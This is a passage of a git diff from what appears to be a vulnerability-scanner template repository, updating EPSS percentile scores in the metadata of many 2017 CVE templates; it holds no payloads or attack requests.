@@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99515 + epss-percentile: 0.99517 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 633665aa82..55b3840375 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89731 + epss-percentile: 0.89737 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index c793c6e755..09b40b0793 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.63327 + epss-percentile: 0.6336 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 6b3d1a9372..12e128712a 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91467 + epss-percentile: 0.91476 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 3f2ca918fe..17cc08fe66 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - epss-percentile: 0.81986 + epss-percentile: 0.81996 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 70d88a1484..b3286ff44b 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48488 + epss-percentile: 0.48501 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 63749414e4..28439b7306 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50058 + epss-percentile: 0.50081 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index b7576da3da..00b829deab 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96872 - epss-percentile: 0.99597 + epss-percentile: 0.99599 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 3d78bc4262..ed2a52393c 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47363 + epss-percentile: 0.47373 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index f9040ef92c..a665209359 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - epss-percentile: 0.9141 + epss-percentile: 0.91415 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index fbca10a9de..5e7a8b0e38 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - epss-percentile: 0.8764 + epss-percentile: 0.87646 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 4270fcc569..5084653d7b 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.97023 - epss-percentile: 0.9966 + epss-percentile: 0.99661 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 1fdf1b85da..bb4f5845f5 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.9325 + epss-percentile: 0.93255 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index d1f661f4bd..a887eeb2bf 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 - epss-percentile: 0.67274 + epss-percentile: 0.67303 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index a3249603df..286897177a 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.29151 - epss-percentile: 0.96357 + epss-percentile: 0.96359 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 7bf63d91aa..8e774f2c37 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62301 + epss-percentile: 0.62329 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index e7ba6acd78..efbeb80365 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00261 - epss-percentile: 0.63635 + epss-percentile: 0.6367 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 7c83c4e9fa..7d5e09f57e 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54891 + epss-percentile: 0.54917 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index a10734903d..be119b0a8e 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-17731 cwe-id: CWE-89 epss-score: 0.14043 - epss-percentile: 0.95068 + epss-percentile: 0.95071 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 2d0e26a9ae..8bd34ea522 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - epss-percentile: 0.9518 + epss-percentile: 0.95182 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index a14394ec5a..ca35c83114 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00072 - epss-percentile: 0.30132 + epss-percentile: 0.30139 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index ed2d92caa2..c21f8c829a 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18487 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index fd8f414787..f23b14124d 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 20c6a36191..88b4c61c28 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 760145dbf8..34750c64bd 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index c77c3eb510..a3d3f0355f 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index ceaebb2df9..2a21fe9a9e 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index c71f10a941..a45a8b7c95 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 7b0b458071..7a9aa21582 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61132 + epss-percentile: 0.61159 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index c4824a9307..0f0bcc10a7 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61132 + epss-percentile: 0.61159 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index d4453ba5ca..5095b9bb77 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61132 + epss-percentile: 0.61159 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index e99a88b4f8..64cdaa37ff 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52796 + epss-percentile: 0.52823 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 98142a7a6e..aade5c1ef6 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index e318f501e3..b60df59fb6 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 9ca2c19ea4..ef23d699f5 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 6bcbc115d0..e12a5c40ec 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index b130e4cf57..6c7788cf29 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 3bd59a75e7..b3d6fd9ec8 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 57c0e82c83..a08630cf1f 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 95982b77ea..98906072d3 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 6f37e9b2f7..52974aa9d7 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 63f942c8b7..f19e0e4db9 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index e6494ec3b8..523f7e1e74 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.6003 + epss-percentile: 0.6006 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index f97f22a281..6e8143a278 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 37542d1622..0e79439630 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 95b4c52217..3922fdb406 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index d59bc83ad8..8e2168b94a 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 7f6688e7f9..c8c928937b 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 6f8ffb7443..a1b73dc7b9 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 86b53a068b..d33aecbafa 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36978 + epss-percentile: 0.3699 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index b23eb43eb9..59d312b4fe 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.39427 + epss-percentile: 0.39442 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index bb7b22a5ff..57878c8c51 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - epss-percentile: 0.80963 + epss-percentile: 0.80974 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 620df82f6d..c63d36f8af 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96927 - epss-percentile: 0.99625 + epss-percentile: 0.99626 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index f7dd14196a..576504fd79 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.805 + epss-percentile: 0.80514 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 21a5195c03..247c8ec128 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49814 + epss-percentile: 0.49833 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index b3267f2862..f6ae7a554d 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99897 + epss-percentile: 0.99898 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index a1c90e4007..86d4a6f07f 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65254 + epss-percentile: 0.6529 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 6b0efedbb3..fa7f9324d2 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91868 + epss-percentile: 0.91879 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 5b7451d22f..dc6b94929b 100644 --- 